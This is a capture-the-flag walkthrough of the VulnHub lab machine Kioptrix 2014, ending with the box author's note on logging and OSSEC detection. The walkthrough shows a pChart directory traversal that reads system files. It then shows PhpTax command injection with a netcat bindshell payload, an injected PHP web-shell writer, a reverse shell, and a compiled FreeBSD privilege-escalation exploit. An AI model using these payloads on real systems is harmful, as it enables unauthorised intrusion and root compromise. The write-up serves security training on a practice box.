NOTES ABOUT Kioptrix 2014
[ 2017-09-09 ] [ VulnHub / Kioptrix 2014 ] Status: Rooted
Skills: Port Scanning, Fuzzing, LFI, PHP, Reverse Shell, FreeBSD Exploit
Tools: nmap, LFI-Digger, User Agent Switch, nc, searchsploit, gcc
PORT SCANNING
root@kali:~/CTF/kioptrix# nmap -v -sS -A -p- 10.17.0.106
[...]
PORT     STATE  SERVICE VERSION
22/tcp   closed ssh
80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
|_http-title: Site doesn't have a title (text/html).
|_xmlrpc-methods: ERROR: Script execution failed (use -d to debug)
8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
|_http-title: 403 Forbidden
|_xmlrpc-methods: ERROR: Script execution failed (use -d to debug)
[...]
root@kali:~/CTF/kioptrix# wfuzz -c -w /usr/share/wordlists/dirb/common.txt --script=headers,robots,sitemap,listing,links --hc 404 http://10.17.0.106:8080/FUZZ
********************************************************
* Wfuzz 2.1.3 - The Web Bruteforcer                    *
********************************************************

Target: http://10.17.0.106:8080/FUZZ
Total requests: 4614

==================================================================
ID      Response   Lines      Word         Chars          Request
==================================================================
00050:  C=200     10 L       22 W          201 Ch        ""
  |_ Directory listing identified
  |_ Plugin links enqueued 1 more requests (rlevel=1)
00760:  C=403      8 L       22 W          210 Ch        "cgi-bin/"
02414:  C=403      8 L       22 W          211 Ch        ".htpasswd"
04606:  C=200     90 L      376 W        11974 Ch        "/phptax/"
  |_ Powered-by header first set - PHP/5.3.8
Port 80 index page source (the commented-out refresh points at pChart2.1.3):

<html>
<head>
<!-- <META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php"> -->
</head>
<body>
<h1>It works!</h1>
</body>
</html>
root@kali:~/CTF/kioptrix# searchsploit pchart
------------------------------------------------------------------ ----------------------------------
 Exploit Title                                                    | Path
                                                                  | (/usr/share/exploitdb/platforms)
------------------------------------------------------------------ ----------------------------------
pChart 2.1.3 - Multiple Vulnerabilities                           | ./php/webapps/31173.txt
------------------------------------------------------------------ ----------------------------------

root@kali:~/CTF/kioptrix# cat /usr/share/exploitdb/platforms/php/webapps/31173.txt
# Exploit Title: pChart 2.1.3 Directory Traversal and Reflected XSS
[...]
[1] Directory Traversal:
"hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd"
[...]
SCRIPT: https://github.com/Claor/LFI-Digger
root@kali:~/CTF/Kioptrix# lfidigger "http://10.17.0.106/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fLFI" ./dics/linux_enum.txt

[+] Message of the day - http://10.17.0.106/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2f/etc/motd
FreeBSD 9.0-RELEASE (GENERIC) #0: Tue Jan  3 07:46:30 UTC 2012
[...]

[+] Networks - http://10.17.0.106/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2f/etc/networks
[...]

[+] - http://10.17.0.106/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2f/etc/resolv.conf
[...]

[+] fstab entries - http://10.17.0.106/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2f/etc/fstab
[...]

[+] crontab - http://10.17.0.106/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2f/etc/crontab
[...]

[+] All users - http://10.17.0.106/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2f/etc/passwd
# $FreeBSD: release/9.0.0/etc/master.passwd 218047 2011-01-28 22:29:38Z pjd $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
[...]
ossec:*:1001:1001:User &:/usr/local/ossec-hids:/sbin/nologin
ossecm:*:1002:1001:User &:/usr/local/ossec-hids:/sbin/nologin
ossecr:*:1003:1001:User &:/usr/local/ossec-hids:/sbin/nologin

[+] Groups - http://10.17.0.106/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2f/etc/group
[...]

[+] Apache config - http://10.17.0.106/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2f/usr/local/etc/apache22/httpd.conf
[...]
Listen 80
Listen 8080
[...]
DocumentRoot "/usr/local/www/apache22/data"
[...]
SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser

<VirtualHost *:8080>
    DocumentRoot /usr/local/www/apache22/data2
    <Directory "/usr/local/www/apache22/data2">
        Options Indexes FollowSymLinks
        AllowOverride All
        Order allow,deny
        Allow from env=Mozilla4_browser
    </Directory>
</VirtualHost>
[...]

[+] SSH config - http://10.17.0.106/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2f/etc/ssh/sshd_config
[...]
PLUGIN: User Agent Switcher [ "Mozilla/4.0 Mozilla4_browser" ] (the :8080 vhost only allows requests whose User-Agent starts with Mozilla/4.0, via the SetEnvIf / Allow from env=Mozilla4_browser rule above; the 403 Forbidden seen by nmap is that rule)
PHPTAX KNOWN VULNS:
root@kali:~/CTF/kioptrix# searchsploit phptax
------------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                           | Path
                                                                         | (/usr/share/exploitdb/platforms)
------------------------------------------------------------------------- ----------------------------------
PhpTax pfilez Parameter Exec Remote Code Injection                       | ./php/webapps/21833.rb
phptax 0.8 - Remote Code Execution Vulnerability                         | ./php/webapps/21665.txt
PhpTax 0.8 - File Manipulation(newvalue_field) Remote Code Execution     | ./php/webapps/25849.txt
------------------------------------------------------------------------- ----------------------------------

root@kali:~/CTF/kioptrix# cat /usr/share/exploitdb/platforms/php/webapps/21665.txt
-----------------------------------------------------
phptax 0.8 <= Remote Code Execution Vulnerability
-----------------------------------------------------

Discovered by: Jean Pascal Pereira

Vendor information:

"PhpTax is free software to do your U.S. income taxes. Tested under Unix environment. The program generates .pdfs that can be printed and sent to the IRS. See homepage for details and screenshot."

Vendor URI: http://sourceforge.net/projects/phptax/

----------------------------------------------------

Risk-level: High

The application is prone to a remote code execution vulnerability.

----------------------------------------------------

drawimage.php, line 63:

include ("./files/$_GET[pfilez]");

// makes a png image
$pfilef=str_replace(".tob",".png",$_GET[pfilez]);
$pfilep=str_replace(".tob",".pdf",$_GET[pfilez]);
Header("Content-type: image/png");
if ($_GET[pdf] == "") Imagepng($image);
if ($_GET[pdf] == "make") Imagepng($image,"./data/pdf/$pfilef");
if ($_GET[pdf] == "make") exec("convert ./data/pdf/$pfilef ./data/pdf/$pfilep");

----------------------------------------------------

Exploit / Proof of Concept:

Bindshell on port 23235 using netcat:

http://localhost/phptax/drawimage.php?pfilez=xxx;%20nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make

** Exploit-DB Verified:**

http://localhost/phptax/index.php?pfilez=1040d1-pg2.tob;nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make
GETTING IN
http://10.17.0.106:8080/phptax/drawimage.php?pfilez=xxx;printf "<?php file_put_contents('rshell.php',base64_decode(\$_GET['e'])); ?>"> shellc.php;&pdf=make
WRITING [ php-reverse-shell ] TO WEB SERVER
http://10.17.0.106:8080/phptax/shellc.php?e=[...]
http://10.17.0.106:8080/phptax/rshell.php
root@kali:~/CTF/kioptrix# nc -lvp 1234
listening on [any] 1234 ...
10.17.0.106: inverse host lookup failed: Unknown host
connect to [10.17.0.30] from (UNKNOWN) [10.17.0.106] 31652
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64
 1:39PM  up  3:51, 0 users, load averages: 0.07, 0.08, 0.02
USER             TTY      FROM              LOGIN@  IDLE WHAT
uid=80(www) gid=80(www) groups=80(www)
sh: can't access tty; job control turned off
$
ELEVATING PRIVILEGES
EXPLOIT SEARCH:
root@kali:~/CTF/kioptrix# searchsploit FreeBSD 9.0
------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                     | Path
                                                                   | (/usr/share/exploitdb/platforms)
------------------------------------------------------------------- ----------------------------------
FreeBSD 9.0-9.1 mmap/ptrace - Privilege Escalation Exploit         | ./freebsd/local/26368.c
FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation Exploit     | ./freebsd/local/28718.c
------------------------------------------------------------------- ----------------------------------

root@kali:~/CTF/kioptrix# nc -lvp 1235 < /usr/share/exploitdb/platforms/freebsd/local/26368.c
listening on [any] 1235 ...
10.17.0.106: inverse host lookup failed: Unknown host
connect to [10.17.0.30] from (UNKNOWN) [10.17.0.106] 23964
$ cd /tmp
$ nc 10.17.0.30 1235 > 26368.c
$ gcc 26368.c -o 26368
$ ./26368
id
uid=0(root) gid=0(wheel) egid=80(www) groups=80(www)
FLAG:
If you are reading this, it means you got root (or cheated).
Congratulations either way...

Hope you enjoyed this new VM of mine. As always, they are made for the beginner in mind, and not meant for the seasoned pentester. However this does not mean one can't enjoy them.

As with all my VMs, besides getting "root" on the system, the goal is to also learn the basics skills needed to compromise a system. Most importantly, in my mind, are information gathering & research. Anyone can throw massive amounts of exploits and "hope" it works, but think about the traffic.. the logs... Best to take it slow, and read up on the information you gathered and hopefully craft better more targeted attacks.

For example, this system is FreeBSD 9. Hopefully you noticed this rather quickly. Knowing the OS gives you any idea of what will work and what won't from the get go. Default file locations are not the same on FreeBSD versus a Linux based distribution. Apache logs aren't in "/var/log/apache/access.log", but in "/var/log/httpd-access.log". Its default document root is not "/var/www/" but in "/usr/local/www/apache22/data". Finding and knowing these little details will greatly help during an attack. Of course my examples are specific for this target, but the theory applies to all systems.

As a small exercise, look at the logs and see how much noise you generated. Of course the log results may not be accurate if you created a snapshot and reverted, but at least it will give you an idea.

For fun, I installed "OSSEC-HIDS" and monitored a few things. Default settings, nothing fancy but it should've logged a few of your attacks. Look at the following files:

/root/folderMonitor.log
/root/httpd-access.log (softlink)
/root/ossec-alerts.log (softlink)

The folderMonitor.log file is just a cheap script of mine to track created/deleted and modified files in 2 specific folders. Since FreeBSD doesn't support "iNotify", I couldn't use OSSEC-HIDS for this.

The httpd-access.log is rather self-explanatory. Lastly, the ossec-alerts.log file is where OSSEC-HIDS puts alerts when monitoring certain files. This one should've detected a few of your web attacks.

Feel free to explore the system and other log files to see how noisy, or silent, you were. And again, thank you for taking the time to download and play. Sincerely hope you enjoyed yourself.

Be good...

loneferret
http://www.kioptrix.com

p.s.: Keep in mind, for each "web attack" detected by OSSEC-HIDS, by default it would've blocked your IP (both in hosts.allow & Firewall) for 600 seconds. I was nice enough to remove that part :)